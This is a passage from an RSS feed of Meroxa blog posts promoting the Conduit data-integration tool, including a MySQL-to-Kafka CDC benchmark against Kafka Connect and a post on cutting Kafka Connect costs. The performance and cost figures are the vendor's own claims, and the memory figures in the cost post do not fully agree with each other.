&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; __name__ &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;__main__&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    OrdersFlow&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h2&gt;Running Everything&lt;/h2&gt;
&lt;p&gt;Start Conduit:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;conduit run&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Run your flow:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;python orders_flow.py run &lt;span class=&quot;token parameter variable&quot;&gt;--s3_bucket&lt;/span&gt; my-data-bucket&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Add &lt;code class=&quot;language-text&quot;&gt;--with batch&lt;/code&gt; if you’re scaling via AWS Batch.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Pro Tips&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Monitor Conduit at &lt;code class=&quot;language-text&quot;&gt;http://localhost:8080/metrics&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Use the &lt;a href=&quot;https://conduit.io/docs/using/other-features/dead-letter-queue&quot;&gt;built-in dead-letter queue&lt;/a&gt; for bad records&lt;/li&gt;
&lt;li&gt;Validate schemas upstream to catch issues early&lt;/li&gt;
&lt;li&gt;Git-track your pipeline YAMLs and Metaflow scripts&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/docs/using/connectors/list&quot;&gt;Explore 100+ Conduit connectors beyond Kafka and S3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;p&gt;If you&apos;re building data pipelines with Metaflow, integrating Conduit is a no-brainer for real-time data ingestion. With hundreds of available connectors, it&apos;s the perfect companion—lightweight, blazing fast, and production-ready out of the box. Start using Conduit today and experience how seamlessly it transforms your streaming data workflows.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[MySQL CDC on a Budget: Conduit beats Kafka Connect]]></title><description><![CDATA[If you're building streaming pipelines and care about efficiency, scalability, and cost, Conduit isn't just an alternative to Kafka Connect, it's the better tool for the job.]]></description><link>https://meroxa.com/blog/mysql-cdc-on-a-budget-conduit-beats-kafka-connect</link><guid isPermaLink="false">https://meroxa.com/blog/mysql-cdc-on-a-budget-conduit-beats-kafka-connect</guid><dc:creator><![CDATA[Maha Mustafa]]></dc:creator><pubDate>Wed, 21 May 2025 14:30:00 GMT</pubDate><content:encoded>&lt;h1&gt;Introduction&lt;/h1&gt;
&lt;p&gt;When we started building Conduit, our goal was to create a viable replacement for Kafka Connect. But lighter, faster, and easier to use. Now, with a mature feature set and the upcoming 1.0 release, we’ve turned our focus to performance and producing benchmarks comparing Conduit with Kafka Connect.&lt;/p&gt;
&lt;p&gt;We started with &lt;a href=&quot;https://meroxa.com/blog/conduit-makes-mongodb-cdc-52percent-faster-than-kafka-connect/&quot;&gt;MongoDB and Kafka&lt;/a&gt;, then tested &lt;a href=&quot;https://meroxa.com/blog/postgres-cdc-showdown-conduit-crushes-kafka-connect/&quot;&gt;Postgres to Kafka&lt;/a&gt;. And now, in this blog post, we will show MySQL to Kafka benchmarks, for Conduit against Kafka Connect across various EC2 instances, highlighting how Conduit performs under real-world conditions, especially when &lt;strong&gt;efficiency, resource usage, cost&lt;/strong&gt;, and &lt;strong&gt;simplicity&lt;/strong&gt; matter most.&lt;/p&gt;
&lt;h1&gt;Benchmarks&lt;/h1&gt;
&lt;h2&gt;Metrics&lt;/h2&gt;
&lt;p&gt;Our benchmarks focus on three metrics: &lt;strong&gt;message throughput&lt;/strong&gt;, &lt;strong&gt;CPU utilization&lt;/strong&gt;, and &lt;strong&gt;Memory Usage&lt;/strong&gt;. Record throughput within Conduit is tracked using Conduit’s metrics, the throughput of Kafka messages is measured using JMX in the Kafka broker, and resource usage is monitored with the information that Docker exposes.&lt;/p&gt;
&lt;h2&gt;Setup&lt;/h2&gt;
&lt;p&gt;To ensure fairness and realism in our comparison, we conducted comprehensive benchmarks using &lt;a href=&quot;https://github.com/ConduitIO/benchi&quot;&gt;Benchi&lt;/a&gt; on different EC2 instance types: &lt;code class=&quot;language-text&quot;&gt;c7a.large&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;c7a.xlarge&lt;/code&gt;, each provisioned with 40GB gp3 EBS volume.&lt;/p&gt;
&lt;p&gt;The pipelines’ configurations used for both Conduit and Kafka Connect are added to another repository called &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/tree/main&quot;&gt;streaming-benchmarks&lt;/a&gt;, which also contains the benchmark results.&lt;/p&gt;
&lt;p&gt;The amount of data we inserted into the MySQL instance for each test was &lt;strong&gt;3 million&lt;/strong&gt; records with the following schema:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;CREATE TABLE &lt;span class=&quot;token function&quot;&gt;users&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token function&quot;&gt;id&lt;/span&gt; INT AUTO_INCREMENT PRIMARY KEY,
	username VARCHAR&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; NOT NULL,
	email VARCHAR&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; UNIQUE NOT NULL,
	first_name VARCHAR&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;,
	last_name VARCHAR&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Benchmark Results&lt;/h2&gt;
&lt;h3&gt;Test #1:&lt;/h3&gt;
&lt;p&gt;Using the EC2 instance &lt;strong&gt;c7a.large, 40GB&lt;/strong&gt; (2 vCPU, 4 GiB RAM), which will have the least resources used throughout these benchmarks.&lt;/p&gt;
&lt;h3&gt;Results:&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;strong&gt;Mode&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;tool&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Message throughput (msg/sec)&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;CPU usage (%)&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;RAM usage (MB)&lt;/strong&gt;&lt;/th&gt;
&lt;th&gt;&lt;strong&gt;Megabytes per second&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CDC&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Conduit&lt;/td&gt;
&lt;td&gt;63,414.1&lt;/td&gt;
&lt;td&gt;70&lt;/td&gt;
&lt;td&gt;682.7&lt;/td&gt;
&lt;td&gt;45.2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Kafka Connect&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Snapshot&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Conduit&lt;/td&gt;
&lt;td&gt;63,806.6&lt;/td&gt;
&lt;td&gt;69.5&lt;/td&gt;
&lt;td&gt;648.4&lt;/td&gt;
&lt;td&gt;45.3&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Kafka Connect&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;This highlights Conduit&apos;s capability to perform efficiently despite limited resources. It successfully handled the MySQL to Kafka pipeline at a robust message rate, consuming low memory. On the other hand, &lt;em&gt;Kafka Connect couldn’t even start due to &lt;strong&gt;insufficient resources&lt;/strong&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;Test #2:&lt;/h3&gt;
&lt;p&gt;Using the EC2 instance &lt;strong&gt;c7a.xlarge, 40GB:&lt;/strong&gt; (4 vCPU, 8 GiB RAM)&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Results&lt;/strong&gt;:&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/bebbb9028ba72304ce3b965737a99768/51800/mysql-ram-usage.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAAB/0lEQVR42p1STWsTURTND1HqUpRgEfyAShdCimtB8Bd013alRFACXYTiR9GVK3+Aa0X/hGJNi1SNtpo2M/M6k/nIJDPvY+b47pvpJDGufHDJhHPvueeee2txHMO2bfi+D8/zwBiD67r431fLsgxJkpgYjUYYj8fgPIWQwFE/ArP6EI5ueNQD0408HVmeA7oOShW/04SkMAxD8yfXiXkJKP2dUo3+zjiHTBNIKU2YvDI3P60ro5amqVFWEeqOlKQcC8P2Q4St+1C/D4sueaHG4J4LedCFYvYsIY1IKitCGkM/8W0f9tXzsC6eAf/0ocCVrPDoWRt2fQFBc71QmZWEXI9D/lWv9ET+7ILdWoKzvAix93mClXi0fUq4MeuhEMIsYk7hj+9gjetwlurguzsFn1SQQhlfQ1J46RyCBxulj9lk5OmlKFUU8O48oWmWqYnCfxESAS1meinFyPOEpO4kkGAccB+34WhCv/kXIXk4HA6rc3nzkWPtNfDy1RcEK1dgX7sA3ikILU/i9naM5Sc53q9uIrp8Ft69tVkPzc1plVyYi8PztzHqjxKstnYQ3GnAWrmB8W7HJB+fpLj7IkTjKce79S34NxfhtZrGIkX3qaerkUxSSSEERxincCOJg8M+ot4vcOYg1XfK9fKSRGOhQLc3wNfOHmLCBwNTS7aRsD8BBW4IiQV/NAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Cpu usage&quot;
        title=&quot;&quot;
        src=&quot;/static/bebbb9028ba72304ce3b965737a99768/5a190/mysql-ram-usage.png&quot;
        srcset=&quot;/static/bebbb9028ba72304ce3b965737a99768/772e8/mysql-ram-usage.png 200w,
/static/bebbb9028ba72304ce3b965737a99768/e17e5/mysql-ram-usage.png 400w,
/static/bebbb9028ba72304ce3b965737a99768/5a190/mysql-ram-usage.png 800w,
/static/bebbb9028ba72304ce3b965737a99768/51800/mysql-ram-usage.png 1196w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/0fec52f826f3fe9a35713d9787db94d3/f213e/mysql-message-throughput.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAACLklEQVR42o1TS2sTURjNXxCXgvgCd0rUVNwK4kKlC6Gg1leRoEJbFFddKIpGQRREtC1iFrEbK77AjQt/gEVxI90kElsak3lk8phH79w7M8fvmxmapCr4wWGY+e493zl3zs10u13UajVomgZd12PU63VYlgXT0NFoNNBqt/FHRVEPfZUJggBCiBhKKfi+D+kL2J5CuWpi5WcV3lIV1vISNMNA0zQRhiHAkBKg/QOEruvGitZXSJNDFsBiaHNAw3g4g98j6se9WGy0hsxfrXARgVt6hs6tKfjfvqS9VBmV+PQR1qUzcGYeDdjOsE3P83pT0g0RHYF5chi/tm2EOz+XfKO1UWrRKU6jvnUDrPxoqjhRGlvmHxJGiQFPBFi2Qqw0POj509ByO+G+f5UQEplmSdQEoD8vQstuh3XlYu8I+i2HqeqFisLQDRfHChYWR06gmdsB521CGBLh2LSN3F1gbnIW9tAWmBP5nmUmZMuO49BhJwoXKhIHbroYvtdH+GY+Xh9IhbNPbOy5A5QmZuGkhAMKOS6cPRWE/0V47qmNvQXgxeQ/CNdb/kyW9113cbTQwuLxETR3b4bz+mWyRgUYfWxj120iHJ+Bk90E8/LYoGV+SgqopOmkAV9/+Dhy38Gphwa+n78A8/B+dD+8A+uXFPrxYhcHHyiUrs2ifSgLc+rqWkZZaUzIL3xDGKvCh7uqoJstGPUGFKVAUKy4JwiekDCaHVTKZXTo1si0x2Ce33/VWw0s34qoAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Message throughput&quot;
        title=&quot;&quot;
        src=&quot;/static/0fec52f826f3fe9a35713d9787db94d3/5a190/mysql-message-throughput.png&quot;
        srcset=&quot;/static/0fec52f826f3fe9a35713d9787db94d3/772e8/mysql-message-throughput.png 200w,
/static/0fec52f826f3fe9a35713d9787db94d3/e17e5/mysql-message-throughput.png 400w,
/static/0fec52f826f3fe9a35713d9787db94d3/5a190/mysql-message-throughput.png 800w,
/static/0fec52f826f3fe9a35713d9787db94d3/f213e/mysql-message-throughput.png 1192w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/4979061d05e1d3e2ee404112d1fd5c73/187fa/mysql-cpu-usage.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAACLUlEQVR42n2Ty2sTURSH8ze4dCHYhQhiqYqKoLFKF6JScFmXCl3V6qKNDRgVm5amZNE/QKguuqkrEevGhc/qQnGltAVfk5h2ksx0MjOZuc/5ee/kUUeJF84s5nC/8505Z1K+78M0TViWhUqlgmqtBkIY/neiqHcuJYQAYwycc4RhiEhqmAThgFElqFl1sK1N2IaBum3Bdy0FlL2BhBAEQdCt/GadY/kdxafvHJxx6LxQISmB7VG8XQuwukHheKqi4JBKKFIXo7Z2KgZ1WlExej9A3w0XhSckfiejVujzuSyRnm7ieM7Dh2+im08Y6jabbUMpJa4/bOLQXYbiwkfwfAaN+TxYvR7nv5Q4hmY9pGcCvF9+BfloEeHq61gkUne1ZepPXf0cf+BjYDrC3MRjOP27sZk+DPbzxw5wxsPpAsOLy9ewvW8X7MmxxKRSlNJ4GC3DCOOLGihRyD6DO9gPc3gItGS0gawFnFPAqzfhHOuDfTvzr6HsGEY7hoXsCtz0AZgXz4CVSknDDvDoXti5TNJQr0wYkr8Mk0Bq9DCMgZNJQ72HQshukTEFPHhPfcOpFXgn98M8n1aGRtdwMO/hlAK+vJKBc2QP7FsTSUNN1Za6ggZPLakpzgsUc0/hXDiBrZFhkHKr5bUSxaWii3PFJp6PZmGfHYA9ewdaR7T3MQbq5dXD0eH6BNsuQdn4Bb9eBW04IGporeERNHwKo1LD1/UN+DWV97w4F/8AQuA3htZOW3cftCkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;cpu usage&quot;
        title=&quot;&quot;
        src=&quot;/static/4979061d05e1d3e2ee404112d1fd5c73/5a190/mysql-cpu-usage.png&quot;
        srcset=&quot;/static/4979061d05e1d3e2ee404112d1fd5c73/772e8/mysql-cpu-usage.png 200w,
/static/4979061d05e1d3e2ee404112d1fd5c73/e17e5/mysql-cpu-usage.png 400w,
/static/4979061d05e1d3e2ee404112d1fd5c73/5a190/mysql-cpu-usage.png 800w,
/static/4979061d05e1d3e2ee404112d1fd5c73/187fa/mysql-cpu-usage.png 1194w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;When scaling up to a more powerful EC2 instance (c7a.xlarge), both Conduit and Kafka Connect were able to run the MySQL to Kafka pipeline. While Kafka Connect delivered slightly higher throughput, around &lt;strong&gt;135K msg/sec,&lt;/strong&gt; Conduit &lt;strong&gt;kept up with an impressive&lt;/strong&gt; ~89K msg/sec**, all while maintaining an** extremely efficient resource usage:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Conduit used &lt;strong&gt;75% less memory&lt;/strong&gt; compared to Kafka Connect (just &lt;strong&gt;500–600 MB&lt;/strong&gt; vs. over &lt;strong&gt;2 GB&lt;/strong&gt;).&lt;/li&gt;
&lt;li&gt;Conduit sustained its throughput with slightly higher CPU, showcasing how it trades CPU for memory, avoiding the usual heavyweight overhead that Kafka Connect tends to have.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;Key Findings: Conduit Delivers Efficient Performance at Scale&lt;/h1&gt;
&lt;p&gt;Across all tested EC2 instance types, from low-resource to high-resource environments, &lt;strong&gt;Conduit consistently proves to be a lean, reliable, and production-ready tool&lt;/strong&gt; for MySQL to Kafka pipeline.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;On &lt;strong&gt;c7a.large&lt;/strong&gt;, &lt;em&gt;&lt;strong&gt;Kafka Connect couldn’t even start&lt;/strong&gt;&lt;/em&gt;, while Conduit ran smoothly, delivering solid throughput with minimal resource usage.&lt;/li&gt;
&lt;li&gt;On &lt;strong&gt;c7a.xlarge&lt;/strong&gt;, Kafka Connect achieved higher throughput, but Conduit held close, using &lt;strong&gt;~75% less memory&lt;/strong&gt; while maintaining competitive performance. Even though Conduit used more CPU (around 80% vs Kafka Connect’s 60%), it did so &lt;strong&gt;intentionally and efficiently&lt;/strong&gt;, making better use of available system resources.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;If you&apos;re building streaming pipelines and care about efficiency, scalability, and cost, &lt;strong&gt;Conduit&lt;/strong&gt; isn&apos;t just an alternative, it&apos;s the better tool for the job.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;Say Hello!&lt;/h2&gt;
&lt;p&gt;Curious about benchmarks? About Conduit? Have ideas for new tests, or have questions about other connectors? Drop us a “hello!” on our &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord channel&lt;/a&gt; or open a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussion&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Kafka Costs Are Too Damn High! Here's How We Saved 73.8% Per Month By Ditching Kafka Connect]]></title><description><![CDATA[Learn how Meroxa achieved a 73.8% cost reduction by replacing Kafka Connect with Conduit, their open-source data integration engine. Discover how they improved memory usage from 1.5GB to 100MB per connector, reduced startup times from 30-60s to ~1s, and cut monthly compute costs from $45K to $12K. This technical deep-dive explores real performance metrics, architectural benefits, and practical implementation details for teams looking to optimize their Kafka infrastructure costs.]]></description><link>https://meroxa.com/blog/kafka-costs-are-too-damn-high-heres-how-we-saved-738percent-per-month-by-ditching-kafka-connect</link><guid isPermaLink="false">https://meroxa.com/blog/kafka-costs-are-too-damn-high-heres-how-we-saved-738percent-per-month-by-ditching-kafka-connect</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 20 May 2025 11:02:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;If you&apos;re using Kafka Connect in production, you&apos;re probably wasting money.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We were.&lt;/p&gt;
&lt;p&gt;At Meroxa, our internal Kafka usage grew alongside our real-time data infrastructure—more topics, more partitions, more connectors. What didn&apos;t scale well? The cost of running Kafka Connect. And we’re not just talking about compute. There were hidden taxes everywhere: memory bloat, operational toil, brittle deployments, and oversized containers just to avoid the next OOM error.&lt;/p&gt;
&lt;p&gt;So we did what anyone tired of burning budget would do: &lt;strong&gt;we ripped it out&lt;/strong&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Setup: Kafka Connect at Scale&lt;/h3&gt;
&lt;p&gt;Our workloads relied on streaming structured data from multiple sources into Kafka—databases, APIs, event logs, you name it. Nothing exotic, but volume was high and reliability was non-negotiable. Like many teams, we leaned on Kafka Connect to stitch it all together.&lt;/p&gt;
&lt;p&gt;That meant standing up connectors (often Debezium-based), tuning memory settings, wiring up schema registries, and managing Kafka Connect workers. The architecture worked. But it came with a tax.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Memory usage per connector&lt;/strong&gt;: up to 1.5 GB&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Typical task restart time&lt;/strong&gt;: 30–60 seconds&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monthly compute cost&lt;/strong&gt;: &lt;strong&gt;$45K&lt;/strong&gt; across dev, staging, and prod&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Eventually, we were spinning up dedicated infrastructure just to keep Kafka Connect stable—and still hitting bottlenecks, restart storms, and config drift. It became clear we were spending more time managing the system than moving data.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Shift: Conduit Instead of Kafka Connect&lt;/h3&gt;
&lt;p&gt;We replaced Kafka Connect with &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt;, an open-source data integration engine we’ve built and battle-tested at Meroxa. We dropped in our own native connectors and ran a head-to-head test.&lt;/p&gt;
&lt;p&gt;Here’s what we saw out of the box:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Connector memory usage&lt;/strong&gt;: ~ 400 MB compared to 7.5GB with Kafka Connect&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Task startup time&lt;/strong&gt;: ~1 second&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Same throughput, 73.8% lower cost&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We didn’t have to scale horizontally just to stay afloat. We didn’t need custom tuning profiles per connector. And we didn’t have to maintain a sprawling fleet of JVM-based connectors that didn’t fail gracefully.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Real Numbers: Before and After&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Metric Comparison: Kafka Connect vs. Conduit&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Memory per connector&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Kafka Connect:&lt;/strong&gt; 1.5GB&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduit:&lt;/strong&gt; 100MB&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Startup time&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Kafka Connect:&lt;/strong&gt; 30–60s&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduit:&lt;/strong&gt; ~1s&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Monthly compute cost&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Kafka Connect:&lt;/strong&gt; ~$45k&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduit:&lt;/strong&gt; ~$12k&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Error recovery behavior&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Kafka Connect:&lt;/strong&gt; Manual restarts required&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduit:&lt;/strong&gt; Automatic retry&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Codebase complexity&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Kafka Connect:&lt;/strong&gt; Java + configs everywhere&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduit:&lt;/strong&gt; Go + single file&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We didn’t sacrifice performance. We gained &lt;em&gt;control&lt;/em&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Why It Worked&lt;/h3&gt;
&lt;p&gt;Conduit is lean by design. Every connector runs in-process, with minimal external dependencies. While both Kafka and Conduit offer &lt;a href=&quot;https://conduit.io/docs/using/other-features/schema-support/#schema-registry&quot;&gt;schema registries&lt;/a&gt;, Conduit takes a more streamlined approach - you only add what you need. No heavyweight plugins or complex distributed systems to manage. Just streams.&lt;/p&gt;
&lt;p&gt;We built it with the modern stack in mind:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Go-based core&lt;/strong&gt;: fast and efficient&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Built-in CDC&lt;/strong&gt;: no Debezium wrappers&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Minimal memory footprint&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/docs/scaling/conduit-operator&quot;&gt;&lt;strong&gt;Stateless deployment support&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can run Conduit inside a container, as a sidecar, or embedded directly inside your app. This flexibility gives us optimization options that just aren&apos;t possible with traditional Connect frameworks.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Best Part: Fewer Pages at 3AM&lt;/h3&gt;
&lt;p&gt;Performance gains are great. Cost savings are better. But the biggest win? We sleep more.&lt;/p&gt;
&lt;p&gt;Kafka Connect failed in ways that were annoying to debug. Silent data loss, zombie connectors, memory leaks—pick your poison. With Conduit, failures are obvious and recoverable. No more grepping logs across four services just to figure out why a connector died.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Want to Try It?&lt;/h3&gt;
